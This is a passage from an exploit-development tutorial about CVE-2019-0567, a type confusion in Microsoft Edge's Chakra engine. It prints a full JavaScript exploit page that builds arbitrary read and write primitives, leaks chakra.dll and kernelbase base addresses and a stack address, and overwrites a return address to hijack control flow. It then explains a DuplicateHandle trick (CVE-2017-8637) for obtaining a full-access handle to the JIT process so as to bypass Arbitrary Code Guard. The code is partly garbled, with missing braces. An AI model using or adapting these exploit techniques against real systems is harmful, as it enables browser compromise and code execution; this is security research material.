// Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

// Print update
document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));

// Counter variable
let counter = 0x6000;

// Loop
while (counter != 0)
    // Store the contents of the stack
    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

    // Print update
    document.write("[+] Stack address 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));

    // Decrement the counter
    // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
    counter -= 0x8;

As we can see above, we do this in β€œreverse” order of our ChakraCore exploit in part two. Since we don’t have the luxury of already knowing where the stack limit is, which is the β€œlast” address that can be used by that thread’s stack, we can’t just traverse the stack by incrementing. Instead, since we are leaking an address towards the β€œbase” of the stack, we have to decrement (since the stack grows downwards) towards the stack limit.

In other words, less technically, we have leaked somewhere towards the β€œbottom” of the stack and we want to walk towards the β€œtop of the stack” in order to scan for return addresses. You’ll notice a few things about the previous code, the first being the arbitrary 0x6000 number. This number was found by trial and error. I started with 0x1000 and ran the loop to see if the exploit crashed. I kept incrementing the number until a crash started to ensue. A crash in this case refers to the fact we are likely reading from decommitted memory, meaning we will cause an access violation. The β€œgist” of this is to basically see how many bytes you can read without crashing, and those are the return addresses you can choose from. Here is how our output looks.

As we start to scroll down through the output, we can clearly see some return address starting to bubble up!

Since I already mentioned the β€œtrial and error” approach in part two, which consists of overwriting a return address (after confirming it is one) and seeing if you end up controlling the instruction pointer by corrupting it, I won’t show this process here again. Just know, as mentioned, that this is just a matter of trial and error (in terms of my approach). The return address that I found worked best for me was chakra!Js::JavascriptFunction::CallFunction<1>+0x83 (again there is no β€œspecial” way to find it. I just started corrupting return address with 0x4141414141414141 and seeing if I caused an access violation with RIP being controlled to by the value 0x4141414141414141, or RSP being pointed to by this value at the time of the access violation).

This value can be seen in the stack leaking contents.

Why did I choose this return address? Again, it was an arduous process taking every stack address and overwriting it until one consistently worked. Additionally, a little less anecdotally, the symbol for this return address is with a function quite literally called CallFunction, which means its likely responsible for executing a function call of interpreted JavaScript. Because of this, we know a function will execute its code and then hand execution back to the caller via the return address. It is likely that this piece of code will be executed (the return address) since it is responsible for calling a function. However, there are many other options that you could choose from.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    0:020> u chakra+0xd4a73
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
			document.write("[+] Found our return address on the stack!");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));

            // Break the loop

        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);

Open the updated exploit.html script and attach WinDbg before pressing the Click me to exploit CVE-2019-0567! button.

After attaching to WinDbg and pressing g, go ahead and click the button (may require clicking twice in some instance to detonate the exploit). Please note that sometimes there is a slight edge case where the return address isn’t located on the stack. So if the debugger shows you crashing on the GetValue method, this is likely a case of that. After testing, 10/10 times I found the return address. However, it is possible once in a while to not encounter it. It is very rare.

After running exploit.html in the debugger, we can clearly see that we have overwritten a return address on the stack with 0x4141414141414141 and Edge is attempting to return into it. We have, again, successfully corrupted control-flow and can now redirect execution wherever we want in Edge. We went over all of this, as well, in part two of this blog series!

Now that we have our read/write primitive and control-flow hijacking ported to Edge, we can now begin our Edge-specific exploitation which involves many ROP chains to bypass Edge mitigations like Arbitrary Code Guard.

Arbitrary Code Guard && Code Integrity Guard

We are now at a point where our exploit has the ability to read/write memory, we control the instruction pointer, and we know where the stack is. With these primitives, exploitation should be as follows (in terms of where exploit development currently and traditionally is at):

  1. Bypass ASLR to determine memory layout (done)
  2. Achieve read/write primitive (done)
  3. Locate the stack (done)
  4. Control the instruction pointer (done)
  5. Write a ROP payload to the stack (TBD)
  6. Write shellcode to the stack (or somewhere else in memory) (TBD)
  7. Mark the stack (or regions where shellcode is) as RWX (TBD)
  8. Execute shellcode (TBD)

Steps 5 through 8 are required as a result of DEP. DEP, a mitigation which has been beaten to death, separates code and data segments of memory. The stack, being a data segment of memory (it is only there to hold data), is not executable whenever DEP is enabled. Because of this, we invoke a function like VirtualProtect (via ROP) to mark the region of memory we wrote our shellcode to (which is a data segment that allows data to be written to it) as RWX. I have documented this procedure time and time again. We leak an address (or abuse non-ASLR modules, which is very rare now), we use our primitive to write to the stack (stack-based buffer overflow in the two previous links provided), we mark the stack as RWX via ROP (the shellcode is also on the stack) and we are now allowed to execute our shellcode since its in a RWX region of memory. With that said, let me introduce a new mitigation into the fold - Arbitrary Code Guard (ACG).

ACG is a mitigation which prohibits any dynamically-generated RWX memory. This is manifested in a few ways, pointed out by Matt Miller in his blog post on ACG. As Matt points out:

β€œWith ACG enabled, the Windows kernel prevents a content process from creating and modifying code pages in memory by enforcing the following policy:

  1. Code pages are immutable. Existing code pages cannot be made writable and therefore always have their intended content. This is enforced with additional checks in the memory manager that prevent code pages from becoming writable or otherwise being modified by the process itself. For example, it is no longer possible to use VirtualProtect to make an image code page become PAGE_EXECUTE_READWRITE.

  2. New, unsigned code pages cannot be created. For example, it is no longer possible to use VirtualAlloc to create a new PAGE_EXECUTE_READWRITE code page.”

What this means is that an attacker can write their shellcode to a data portion of memory (like the stack) all they want, gladly. However, the permissions needed (e.g. the memory must be explicitly marked executable by the adversary) can never be achieved with ACG enabled. At a high level, no memory permissions in Edge (specifically content processes, where our exploit lives) can be modified (we can’t write our shellcode to a code page nor can we modify a data page to execute our shellcode).

Now, you may be thinking - β€œConnor, instead of executing native shellcode in this manner, why don’t you just use WinExec like in your previous exploit from part two of this blog series to spawn cmd.exe or some other application to download some staged DLL and just load it into the process space?” This is a perfectly valid thought - and, thus, has already been addressed by Microsoft.

Edge has another small mitigation known as β€œno child processes”. This nukes any ability to spawn a child process to go inject some shellcode into another process, or load a DLL. Not only that, even if there was no mitigation for child processes, there is a β€œsister” mitigation to ACG called Code Integrity Guard (CIG) which also is present in Edge.

CIG essentially says that only Microsoft-signed DLLs can be loaded into the process space. So, even if we could reach out to a retrieve a staged DLL and get it onto the system, it isn’t possible for us to load it into the content process, as the DLL isn’t a signed DLL (inferring the DLL is a malicious one, it wouldn’t be signed).

So, to summarize, in Edge we cannot:

  1. Use VirtualProtect to mark the stack where our shellcode is to RWX in order to execute it
  2. We can’t use VirtualProtect to make a code page (RX memory) to writable in order to write our shellcode to this region of memory (using something like a WriteProcessMemory ROP chain)
  3. We cannot allocate RWX memory within the current process space using VirtualAlloc
  4. We cannot allocate RW memory with VirtualAlloc and then mark it as RX
  5. We cannot allocate RX memory with VirtualAlloc and then mark it as RW

With the advent of all three of these mitigations, previous exploitation strategies are all thrown out of the window. Let’s talk about how this changes our exploit strategy, now knowing we cannot just execute shellcode directly within the content process.

CVE-2017-8637 - Combining Vulnerabilities

As we hinted at, and briefly touched on earlier in this blog post, we know that something has to be done about JIT code with ACG enablement. This is because, by default, JIT code is generated as RWX. If we think about it, JIT’d code first starts out as an β€œempty” allocation (just like when we allocate some memory with VirtualAlloc). This memory is first marked as RW (it is writable because Chakra needs to actually write the code into it that will be executed into the allocation). We know that since there is no execute permission on this RW allocation, and this allocation has code that needs to be executed, the JIT engine has to change the region of memory to RX after its generated. This means the JIT engine has to generate dynamic code that has its memory permissions changed. Because of this, no JIT code can really be generated in an Edge process with ACG enabled. As pointed out in Matt’s blog post (and briefly mentioned by us) this architectural issue was addresses as follows:

β€œModern web browsers achieve great performance by transforming JavaScript and other higher-level languages into native code. As a result, they inherently rely on the ability to generate some amount of unsigned native code in a content process. Enabling JIT compilers to work with ACG enabled is a non-trivial engineering task, but it is an investment that we’ve made for Microsoft Edge in the Windows 10 Creators Update. To support this, we moved the JIT functionality of Chakra into a separate process that runs in its own isolated sandbox. The JIT process is responsible for compiling JavaScript to native code and mapping it into the requesting content process. In this way, the content process itself is never allowed to directly map or modify its own JIT code pages.”

As we have already seen in this blog post, two processes are generated (JIT server and content process) and the JIT server is responsible for taking the JavaScript code from the content process and transforming it into machine code. This machine code is then mapped back into the content process with appropriate permissions (like that of the .text section, RX). The vulnerability (CVE-2017-8637) mentioned in this section of the blog post took advantage of a flaw in this architecture to compromise Edge fully and, thus, bypass ACG. Let’s talk about a bit about the architecture of the JIT server and content process communication channel first (please note that this vulnerability has been patched).

The last thing to note, however, is where Matt says that the JIT process was moved β€œβ€¦into a separate process that runs in its own isolated sandbox”. Notice how Matt did not say that it was moved into an ACG-compliant process (as we know, ACG isn’t compatible with JIT). Although the JIT process may be β€œsandboxed” it does not have ACG enabled. It does, however, have CIG and β€œno child processes” enabled. We will be taking advantage of the fact the JIT process doesn’t (and still to this day doesn’t, although the new V8 version of Edge only has ACG support in a special mode) have ACG enabled. With our ACG bypass, we will leverage a vulnerability with the way Chakra-based Edge managed communications (specifically via a process handle stored within the content process) to and from the JIT server. With that said, let’s move on.

Leaking The JIT Server Handle

The content process uses an RPC channel in order to communicate with the JIT server/process. I found this out by opening chakra.dll within IDA and searching for any functions which looked interesting and contained the word β€œJIT”. I found an interesting function named JITManager::ConnectRpcServer. What stood out to me immediately was a call to the function DuplicateHandle within JITManager::ConnectRpcServer.

If we look at ChakraCore we can see the source (which should be close between Chakra and ChakraCore) for this function. What was very interesting about this function is the fact that the first argument this function accepts is seemingly a β€œhandle to the JIT process”.

Since chakra.dll contains the functionality of the Chakra JavaScript engine and since chakra.dll, as we know, is loaded into the content process - this functionality is accessible through the content process (where our exploit is running). This infers at some point the content process is doing something with what seems to be a handle to the JIT server. However, we know that the value of jitProcessHandle is supplied by the caller (e.g. the function which actually invokes JITManager::ConnectRpcServer). Using IDA, we can look for cross-references to this function to see what function is responsible for calling JITManager::ConnectRpcServer.

Taking a look at the above image, we can see the function ScriptEngine::SetJITConnectionInfo is responsible for calling JITManager::ConnectRpcServer and, thus, also for providing the JIT handle to the function. Let’s look at ScriptEngine::SetJITConnectionInfo to see exactly how this function provides the JIT handle to JITManager::ConnectRpcServer.

We know that the __fastcall calling convention is in use, and that the first argument of JITManager::ConnectRpcServer (as we saw in the ChakraCore code) is where the JIT handle goes. So, if we look at the above image, whatever is in RCX directly prior to the call to JITManager::ConnectRpcServer will be the JIT handle. We can see this value is gathered from a symbol called s_jitManager.

We know that this is the value that is going to be passed to the JITManager::ConnectRpcServer function in the RCX register - meaning that this symbol has to contain the handle to the JIT server. Let’s look again, once more, at JITManager::ConnectRpcServer (this time with some additional annotation).

We already know that RCX = s_jitManager when this function is executed. Looking deeper into the disassembly (almost directly before the DuplicateHandle call) we can see that s_jitManager+0x8 (a.k.a RCX at an offset of 0x8) is loaded into R14. R14 is then used as the lpTargetHandle parameter for the call to DuplicateHandle. Let’s take a look at DuplicateHandle’s prototype (don’t worry if this is confusing, I will provide a summation of the findings very shortly to make sense of this).

If we take a look at the description above, the lpTargetHandle will β€œβ€¦receive the duplicate handle…”. What this means is that DuplicateHandle is used in this case to duplicate a handle to the JIT server, and store the duplicated handle within s_jitManager+0x8 (a.k.a the content process will have a handle to the JIT server) We can base this on two things - the first being that we have anecdotal evidence through the name of the variable we located in ChakraCore, which is jitprocessHandle. Although Chakra isn’t identical to ChakraCore in every regard, Chakra is following the same convention here. Instead, however, of directly supplying the jitprocessHandle - Chakra seems to manage this information through a structure called s_jitManager. The second way we can confirm this is through hard evidence.

If we examine chakra!JITManager::s_jitManager+0x8 (where we have hypothesized the duplicated JIT handle will go) within WinDbg, we can clearly see that this is a handle to a process with PROCESS_DUP_HANDLE access. We can also use Process Hacker to examine the handles to and from MicrosoftEdgeCP.exe. First, run Process Hacker as an administrator. From there, double-click on the MicrosoftEdgeCP.exe content process (the one using the most RAM as we saw, PID 4172 in this case). From there, click on the Handles tab and then sort the handles numerically via the Handle tab by clicking on it until they are in ascending order.

If we then scroll down in this list of handles, we can see our handle of 0x314. Looking at the Name column, we can also see that this is a handle to another MicrosoftEdgeCP.exe process. Since we know there are only two (whenever exploit.html is spawned and no other tabs are open) instances of MicrosoftEdgeCP.exe, the other β€œcontent process” (as we saw earlier) must be our JIT server (PID 7392)!

Another way to confirm this is by clicking on the General tab of our content process (PID 4172). From there, we can click on the Details button next to Mitigation policies to confirm that ACG (called β€œDynamic code prohibited” here) is enabled for the content process where our exploit is running.

However, if we look at the other content process (which should be our JIT server) we can confirm ACG is not running. Thus, indicating, we know exactly which process is our JIT server and which one is our content process. From now on, no matter how many instances of Edge are running on a given machine, a content process will always have a PROCESS_DUP_HANDLE handle to the JIT server located at chakra::JITManager::s_jitManager+0x8.

So, in summation, we know that s_jitManager+0x8 contains a handle to the JIT server, and it is readable from the content process (where our exploit is running). You may also be asking β€œwhy does the content process need to have a PROCESS_DUP_HANDLE handle to the JIT server?” We will come to this shortly.

Turning our attention back to the aforementioned analysis, we know we have a handle to the JIT server. You may be thinking - we could essentially just use our arbitrary read primitive to obtain this handle and then use it to perform some operations on the JIT process, since the JIT process doesn’t have ACG enabled! This may sound very enticing at first. However, let’s take a look at a malicious function like VirtualAllocEx for a second, which can allocate memory within a remote process via a supplied process handle (which we have). VirtualAllocEx documentation states that:

The handle must have the PROCESS_VM_OPERATION access right. For more information, see Process Security and Access Rights.

This β€œkills” our idea in its tracks - the handle we have only has the permission PROCESS_DUP_HANDLE. We don’t have the access rights to allocate memory in a remote process where perhaps ACG is disabled (like the JIT server). However, due to a vulnerability (CVE-2017-8637), there is actually a way we can abuse the handle stored within s_jitManager+0x8 (which is a handle to the JIT server). To understand this, let’s just take a few moments to understand why we even need a handle to the JIT server, from the content process, in the first place.

Let’s now turn out attention to this this Google Project Zero issue regarding the CVE.

We know that the JIT server (a different process) needs to map JIT’d code into the content process. As the issue explains:

In order to be able to map executable memory in the calling process, JIT process needs to have a handle of the calling process. So how does it get that handle? It is sent by the calling process as part of the ThreadContext structure. In order to send its handle to the JIT process, the calling process first needs to call DuplicateHandle on its (pseudo) handle.

The above is self explanatory. If you want to do process injection (e.g. map code into another process) you need a handle to that process. So, in the case of the JIT server - the JIT server knows it is going to need to inject some code into the content process. In order to do this, the JIT server needs a handle to the content process with permissions such as PROCESS_VM_OPERATION. So, in order for the JIT process to have a handle to the content process, the content process (as mentioned above) shares it with the JIT process. However, this is where things get interesting.

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle. According to Microsoft, a pseudo handle:

… is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.

So, in other words, a pseudo handle is a handle to the current process and it is only valid within context of the process it is generated in. So, for example, if the content process called GetCurrentProcess to obtain a pseudo handle which represents the content process (essentially a handle to itself), this pseudo handle wouldn’t be valid within the JIT process. This is because the pseudo handle only represents a handle to the process which called GetCurrentProcess. If GetCurrentProcess is called in the JIT process, the handle generated is only valid within the JIT process. It is just an β€œeasy” way for a process to specify a handle to the current process. If you supplied this pseudo handle in a call to WriteProcessMemory, for instance, you would tell WriteProcessMemory β€œhey, any memory you are about to write to is found within the current process”. Additionally, this pseudo handle has PROCESS_ALL_ACCESS permissions.

Now that we know what a pseudo handle is, let’s revisit this sentiment:

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle.

What the content process will do is obtain its pseudo handle by calling GetCurrentProcess (which is only valid within the content process). This handle is then used in a call to DuplicateHandle. In other words, the content process will duplicate its pseudo handle. You may be thinking, however, β€œConnor you just told me that a pseudo handle can only be used by the process which called GetCurrentProcess. Since the content process called GetCurrentProcess, the pseudo handle will only be valid in the content process. We need a handle to the content process that can be used by another process, like the JIT server. How does duplicating the handle change the fact this pseudo handle can’t be shared outside of the content process, even though we are duplicating the handle?”

The answer is pretty straightforward - if we look in the GetCurrentProcess Remarks section we can see the following text:

A process can create a β€œreal” handle to itself that is valid in the context of other processes, or that can be inherited by other processes, by specifying the pseudo handle as the source handle in a call to the DuplicateHandle function.

So, even though the pseudo handle only represents a handle to the current process and is only valid within the current process, the DuplicateHandle function has the ability to convert this pseudo handle, which is only valid within the current process (in our case, the current process is the content process where the pseudo handle to be duplicated exists) into an actual or real handle which can be leveraged by other processes. This is exactly why the content process will duplicate its pseudo handle - it allows the content process to create an actual handle to itself, with PROCESS_ALL_ACCESS permissions, which can be actively used by other processes (in our case, this duplicated handle can be used by the JIT server to map JIT’d code into the content process).

So, in totality, it’s possible for the content process to call GetCurrentProcess (which returns a PROCESS_ALL_ACCESS handle to the content process) and then use DuplicateHandle to duplicate this handle for the JIT server to use. However, where things get interesting is the third parameter of DuplicateHandle, which is hTargetProcessHandle. This parameter has the following description:

A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right…

In our case, we know that the β€œprocess that is to receive the duplicated handle” is the JIT server. After all, we are trying to send a (duplicated) content process handle to the JIT server. This means that when the content process calls DuplicateHandle in order to duplicate its handle for the JIT server to use, according to this parameter, the JIT server also needs to have a handle to the content process with PROCESS_DUP_HANDLE. If this doesn’t make sense, re-read the description provided of hTargetProcessHandle. This is saying that this parameter requires a handle to the process where the duplicated handle is going to go (specifically a handle with PROCESS_DUP_HANDLE) permissions.

This means, in less words, that if the content process wants to call DuplicateHandle in order to send/share its handle to/with the JIT server so that the JIT server can map JIT’d code into the content process, the content process also needs a PROCESS_DUP_HANDLE to the JIT server.

This is the exact reason why the s_jitManager structure in the content process contains a PROCESS_DUP_HANDLE to the JIT server. Since the content process now has a PROCESS_DUP_HANDLE handle to the JIT server (s_jitManager+0x8), this s_jitManager+0x8 handle can be passed in to the hTargetProcessHandle parameter when the content process duplicates its handle via DuplicateHandle for the JIT server to use. So, to answer our initial question - the reason why this handle exists (why the content process has a handle to the JIT server) is so DuplicateHandle calls succeed where content processes need to send their handle to the JIT server!

As a point of contention, this architecture is no longer used and the issue was fixed according to Ivan:

This issue was fixed by using an undocumented system_handle IDL attribute to transfer the Content Process handle to the JIT Process. This leaves handle passing in the responsibility of the Windows RPC mechanism, so Content Process no longer needs to call DuplicateHandle() or have a handle to the JIT Process.

So, to beat this horse to death, let me concisely reiterate one last time:

  1. JIT process wants to inject JIT’d code into the content process. It needs a handle to the content process to inject this code
  2. In order to fulfill this need, the content process will duplicate its handle and pass it to the JIT server
  3. In order for a duplicated handle from process β€œA” (the content process) to be used by process β€œB” (the JIT server), process β€œB” (the JIT server) first needs to give its handle to process β€œA” (the content process) with PROCESS_DUP_HANDLE permissions. This is outlined by hTargetProcessHandle which requires β€œa handle to the process that is to receive the duplicated handle” when the content process calls DuplicateHandle to send its handle to the JIT process
  4. Content process first stores a handle to the JIT server with PROCESS_DUP_HANDLE to fulfill the needs of hTargetProcessHandle
  5. Now that the content process has a PROCESS_DUP_HANDLE to the JIT server, the content process can call DuplicateHandle to duplicate its own handle and pass it to the JIT server
  6. JIT server now has a handle to the content process

The issue with this is number three, as outlined by Microsoft:

A process that has some of the access rights noted here can use them to gain other access rights. For example, if process A has a handle to process B with PROCESS_DUP_HANDLE access, it can duplicate the pseudo handle for process B. This creates a handle that has maximum access to process B. For more information on pseudo handles, see GetCurrentProcess.

What Microsoft is saying here is that if a process has a handle to another process, and that handle has PROCESS_DUP_HANDLE permissions, it is possible to use another call to DuplicateHandle to obtain a full-fledged PROCESS_ALL_ACCESS handle. This is the exact scenario we currently have. Our content process has a PROCESS_DUP_HANDLE handle to the JIT process. As Microsoft points out, this can be dangerous because it is possible to call DuplicateHandle on this PROCESS_DUP_HANDLE handle in order to obtain a full-access handle to the JIT server! This would allow us to have the necessary handle permissions, as we showed earlier with VirtualAllocEx, to compromise the JIT server. The reason why CVE-2017-8637 is an ACG bypass is because the JIT server doesn’t have ACG enabled! If we, from the content process, can allocate memory and write shellcode into the JIT server (abusing this handle) we would compromise the JIT process and execute code, because ACG isn’t enabled there!

So, we could setup a call to DuplicateHandle as such:

	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// Ignored since we later specify DUPLICATE_SAME_ACCESS
	0,			// FALSE (handle can't be inherited)
	DUPLICATE_SAME_ACCESS	// Create handle with same permissions as source handle (source handle = GetCurrentProcessHandle() so PROCESS_ALL_ACCESS permissions)

Let’s talk about where these parameters came from.

  1. hSourceProcessHandle - β€œA handle to the process with the handle to be duplicated. The handle must have the PROCESS_DUP_HANDLE access right.”
    • The value we are passing here is jitHandle (which represents our PROCESS_DUP_HANDLE to the JIT server). As the parameter description says, we pass in the handle to the process where the β€œhandle we want to duplicate exists”. Since we are passing in the PROCESS_DUP_HANDLE to the JIT server, this essentially tells DuplicateHandle that the handle we want to duplicate exists somewhere within this process (the JIT process).
  2. hSourceHandle - β€œThe handle to be duplicated. This is an open object handle that is valid in the context of the source process.”
    • We supply a value of GetCurrentProcess here. What this means is that we are asking DuplicateHandle to duplicate a pseudo handle to the current process. In other words, we are asking DuplicateHandle to duplicate us a PROCESS_ALL_ACCESS handle. However, since we have passed in the JIT server as the hSourceProcessHandle parameter we are instead asking DuplicateHandle to β€œduplicate us a pseudo handle for the current process”, but we have told DuplicateHandl that our β€œcurrent process” is the JIT process as we have changed our β€œprocess context” by telling DuplicateHandle to perform this operation in context of the JIT process. Normally GetCurrentProcess would return us a handle to the process in which the function call occurred in (which, in our exploit, will obviously happen within a ROP chain in the content process). However, we use the β€œtrick” up our sleeve, which is the leaked handle to the JIT server we have stored in the content process. When we supply this handle, we β€œtrick” DuplicateHandle into essentially duplicating a PROCESS_ALL_ACCESS handle within the JIT process instead.
  3. hTargetProcessHandle - β€œA handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right.”
    • We supply a value of GetCurrentProcess here. This makes sense, as we want to receive the full handle to the JIT server within the content process. Our exploit is executing within the content process so we tell DuplicateHandle that the process we want to receive this handle in context of is the current, or content process. This will allow the content process to use it later.
  4. lpTargetHandle - β€œA pointer to a variable that receives the duplicate handle. This handle value is valid in the context of the target process. If hSourceHandle is a pseudo handle returned by GetCurrentProcess or GetCurrentThread, DuplicateHandle converts it to a real handle to a process or thread, respectively.”
    • This is the most important part. Not only is this the variable that will receive our handle (fulljitHandle just represents a memory address where we want to store this handle. In our exploit we will just find an empty .data address to store it in), but the second part of the parameter description is equally as important. We know that for hSourceHandle we supplied a pseudo handle via GetCurrentProcess. This description essentially says that DuplicateHandle will convert this pseudo handle in hSourceHandle into a real handle when the function completes. As we mentioned, we are using a β€œtrick” with our hSourceProcessHandle being the JIT server and our hSourceHandle being a pseudo handle. We, as mentioned, are telling Edge to search within the JIT process for a pseudo handle β€œto the current process”, which is the JIT process. However, a pseudo handle would really only be usable in context of the process where it was being obtained from. So, for instance, if we obtained a pseudo handle to the JIT process it would only be usable within the JIT process. This isn’t ideal, because our exploit is within the content process and any handle that is only usable within the JIT process itself is useless to us. However, since DuplicateHandle will convert the pseudo handle to a real handle, this real handle is usable by other processes. This essentially means our call to DuplicateHandle will provide us with an actual handle with PROCESS_ALL_ACCESS to the JIT server from another process (from the content process in our case).
  5. dwDesiredAccess - β€œThe access requested for the new handle. For the flags that can be specified for each object type, see the following Remarks section. This parameter is ignored if the dwOptions parameter specifies the DUPLICATE_SAME_ACCESS flag…”
    • We will be supplying the DUPLICATE_SAME_ACCESS flag later, meaning we can set this to 0.
  6. bInheritHandle - β€œA variable that indicates whether the handle is inheritable. If TRUE, the duplicate handle can be inherited by new processes created by the target process. If FALSE, the new handle cannot be inherited.”
    • Here we set the value to FALSE. We don’t want to/nor do we care if this handle is inheritable.
  7. dwOptions - β€œOptional actions. This parameter can be zero, or any combination of the following values.”
    • Here we provide 2, or DUPLICATE_SAME_ACCESS. This instructs DuplicateHandle that we want our duplicate handle to have the same permissions as the handle provided by the source. Since we provided a pseudo handle as the source, which has PROCESS_ALL_ACCESS, our final duplicated handle fulljitHandle will have a real PROCESS_ALL_ACCESS handle to the JIT server which can be used by the content process.

If this all sounds confusing, take a few moments to keep reading the above. Additionally, here is a summation of what I said:

